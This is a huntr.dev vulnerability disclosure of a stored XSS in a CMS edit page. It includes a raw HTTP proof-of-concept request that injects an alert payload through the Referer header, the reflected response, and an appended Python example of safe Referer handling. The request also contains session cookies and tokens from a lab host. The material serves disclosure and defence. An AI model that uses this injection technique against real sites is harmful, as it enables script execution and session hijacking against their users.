huntr / tht1997 / D00686B0-F89A-4E14-98D7-B8DD3F92A6E5
History: Mar 29, 2023 - 4:49 p.m.

Stored XSS on Multiple Edit Page

2023-03-29 16:49:32
tht1997
www.huntr.dev
8
Tags: xss, editing page, docker, version 1.3.4, post request

EPSS: 0.001 (Low), percentile: 34.7%

Description

A stored XSS with an alert on the Editing page.
I cloned the repo from the master branch and built it with Docker. The footer shows: Version: 1.3.4

Proof of Concept

Request image: post

Request raw:

POST /api/save_edit HTTP/1.1
Host: 192.168.125.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-XSRF-TOKEN: eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 2818
Origin: http://192.168.125.131
Connection: close
Referer: http://192.168.125.131/apin0abo'-alert(1)-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1
Cookie: memos_session=MTY3OTkxODY4MXxEdi1CQkFFQ180SUFBUkFCRUFBQUh2LUNBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBSUFBZz09fPBd6-5P1k3WJKsaxErdPjFPp6_OkTFmibrRXU0E3jlz; laravel_session=1MLKTpLjLEnXntYlC7Kw07pxYCLz07o4gAQOjbAJ; XSRF-TOKEN=eyJpdiI6IlFJN0ZtaE5JbDhLVWpFZHBSRFVWcFE9PSIsInZhbHVlIjoiRDJQMEgrbkVmSURiZC9GWThuY2ZJMnp4YkV4aVlqQitQN0Vwa1RkK1Nxc1FuYXc1Zzd0ZVJuTjFCUm1HeU02MHVMeEcyNjhZYzhnWi9NUkEzNWg2NXlUQXpLTmJzYlpJVlNqOGtYaHJJampyZjdaVHl0eDVRY3E2NFhMSkNNRVoiLCJtYWMiOiJlZDk4NWVlYmRlN2YxNjRjYmY1NGM0ZWVlZGE4OTIwNTc5NjZhZjMxMWQzMzVlNjMzOWMzY2I5MGJhMWYwN2E4IiwidGFnIjoiIn0%3D; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CMahzlzZOpS3Y7m6i4lxf5eXVsT2AnzPdq7QstBMlgP6wi0j7xF1htq8P64nT%7C%242y%2410%247pQV%2FPF1ZAtlOQwyplLOYeiS9NPByLu64prJf.h%2FWC8W9zW8Rx7s.; back_to_admin=http%3A//192.168.125.131/admin/view%3Asettings%23option_group%3Dwebsite; mw-back-to-live-edit=true; show-sidebar-layouts=0

data_base64=eyJmaWVsZF9kYXRhXzAiOnsiYXR0cmlidXRlcyI6eyJjbGFzcyI6ImVkaXQgbWFpbi1jb250ZW50IiwicmVsIjoiY29udGVudCIsImZpZWxkIjoiY29udGVudCJ9LCJodG1sIjoiXG4gICAgPGRpdiBjbGFzcz1cIm1vZHVsZSBtb2R1bGUtbGF5b3V0c1wiIGlkPVwibW9kdWxlLWxheW91dHMtMjZcIiBkYXRhLW13LXRpdGxlPVwiTGF5b3V0c1wiIHRlbXBsYXRlPVwic2tpbi0xXCIgZGF0YS10eXBlPVwibGF5b3V0c1wiIHBhcmVudC1tb2R1bGU9XCJsYXlvdXRzXCIgcGFyZW50LW1vZHVsZS1pZD1cIm1vZHVsZS1sYXlvdXRzLTI2XCI%2BXG5cbjxzZWN0aW9uIGNsYXNzPVwic2VjdGlvbiBwLXQtMTAwIHAtYi0xMDAgbm9kcm9wIGNsZWFuLWNvbnRhaW5lciBlZGl0IGNoYW5nZWRcIiBmaWVsZD1cImxheW91dC1za2luLTEtbW9kdWxlLWxheW91dHMtMjZcIiByZWw9XCJtb2R1bGVcIj5cbiAgICA8ZGl2IGNsYXNzPVwiY29udGFpbmVyXCI%2BXG4gICAgICAgIDxkaXYgY2xhc3M9XCJyb3dcIj5cbiAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJjb2wtMTIgY29sLW1kLTEyIGFsbG93LWRyb3AgZWxlbWVudFwiIGlkPVwiZWxlbWVudF8xNjgwMTA1NTE2NzUyXCI%[…]%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICAgICAgXG4gICAgICAgICAgICAgICAgICAgICAgICA8L3A%2BPC9kaXY%2BXG4gICAgICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgICAgIDwvZGl2PlxuICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgIDwvZGl2PlxuICAgIDwvZGl2PlxuPC9zZWN0aW9uPlxuPC9kaXY%[…]%2BXG4gICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9XCJtdy1jb2xcIiBzdHlsZT1cIndpZHRoOiAxMDAlOyBoZWlnaHQ6IGF1dG87XCI%2BXG4gICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPVwibXctZW1wdHktZWxlbWVudCBlbGVtZW50XCIgaWQ9XCJlbGVtZW50XzE2ODAxMDU1MTY3NTRcIiBzdHlsZT1cInZpc2liaWxpdHk6IHZpc2libGU7XCI%2BPHAgY2xhc3M9XCJlbGVtZW50XCI%2BPC9wPjwvZGl2PjxkaXYgY2xhc3M9XCJtdy1jb2wtY29udGFpbmVyIGVsZW1lbnRcIj48cCBjbGFzcz1cImVsZW1lbnRcIj5cbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBcbiAgICAgICAgICAgICAgICAgICAgICAgIDwvcD48L2Rpdj5cbiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICAgICAgPC9kaXY%2BXG4gICAgICAgICAgICA8L2Rpdj5cbiAgICAgICAgPC9kaXY%2BXG4gICAgPC9kaXY%2BXG4ifSwiaXNfZHJhZnQiOnRydWV9

Response:

{"new_page_url":"http:\/\/192.168.125.131\/apin0abo'-alert(1)-'rzdwg\/file-manager\/list","0":{"rel_type":"module","rel_id":0,"value":"\n    <div>\n        <div>\n            <div>\n                <div>\n                    <div>\n                        <div><p>&lt;\/p&gt;&lt;\/div&gt;<div><p>\n                            \n                        &lt;\/p&gt;&lt;\/div&gt;\n                    &lt;\/div&gt;\n                &lt;\/div&gt;\n            &lt;\/div&gt;\n        &lt;\/div&gt;\n    &lt;\/div&gt;\n","field":"layout-skin-1-module-layouts-26","is_draft":1,"url":"apin0abo'-alert(1)-'rzdwg\/file-manager\/list"}}

Note:

Edit header:
Referer: http://192.168.125.131/apin0abo'-alert('tuanth1997')-'rzdwg/file-manager/list?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1

Example image: alert

Video POC 1
Video POC 2
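The response above shows the root cause from the defender's side: the path of the attacker-supplied Referer header is copied into new_page_url (and from there into the edit page) without validation or escaping, so the quote and parenthesis characters in the path survive intact. The following is an added example, not code from the report or from the affected project (which the report does not name), of how a server can derive a "back to" URL from Referer safely: enforce same origin against the Host header, allow only a conservative character set in each path segment, percent-encode the query, and HTML-escape before embedding. The function names, the allow-list regex and the sample Referer values are assumptions constructed for illustration; the malicious sample is the Referer from the report.

```python
"""Added example (not part of the huntr report or the affected project):
safely derive a same-origin "back to" URL from a Referer header so that
attacker-controlled characters never reach the edit page."""
import html
import re
from urllib.parse import quote, urlsplit, urlunsplit

# Constructed samples: the Referer from the report and a benign variant.
MALICIOUS_REFERER = ("http://192.168.125.131/apin0abo'-alert(1)-'rzdwg/file-manager/list"
                     "?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1")
BENIGN_REFERER = ("http://192.168.125.131/apin0abo/file-manager/list"
                  "?order=asc&orderBy=filemtime&path=%2F&limit=50&page=1")

# Allow-list for a single path segment (assumption: the application's
# page slugs only use these characters). Quotes, parentheses and angle
# brackets are rejected outright rather than escaped.
_SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_.-]+$")


def safe_back_url(referer, expected_host, default="/"):
    """Return a path+query derived from `referer`, or `default` when the
    referer is absent, off-origin, or contains a path segment outside the
    allow-list. The result never carries a scheme or host, so it cannot
    redirect off-site."""
    if not referer:
        return default
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https") or parts.netloc != expected_host:
        return default
    segments = [s for s in parts.path.split("/") if s]
    if any(not _SAFE_SEGMENT.match(s) for s in segments):
        return default
    # Re-encode the query: '=' '&' and existing '%' escapes are kept,
    # anything else (including quotes) becomes a percent-escape.
    query = quote(parts.query, safe="=&%")
    path = "/" + "/".join(segments)
    return urlunsplit(("", "", path, query, ""))


def embed_in_attribute(url):
    """HTML-escape a URL for use inside a quoted attribute or JSON-in-HTML
    context. Always apply this on output even after validation."""
    return html.escape(url, quote=True)


if __name__ == "__main__":
    host = "192.168.125.131"
    print(safe_back_url(MALICIOUS_REFERER, host))   # falls back to "/"
    print(safe_back_url(BENIGN_REFERER, host))      # same-origin path kept
    print(embed_in_attribute(safe_back_url(BENIGN_REFERER, host)))
```

Rejecting the malicious path rather than trying to "clean" it keeps the logic simple and auditable; the output escaping in embed_in_attribute is the second layer, so a future change to the allow-list cannot by itself reintroduce the injection.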

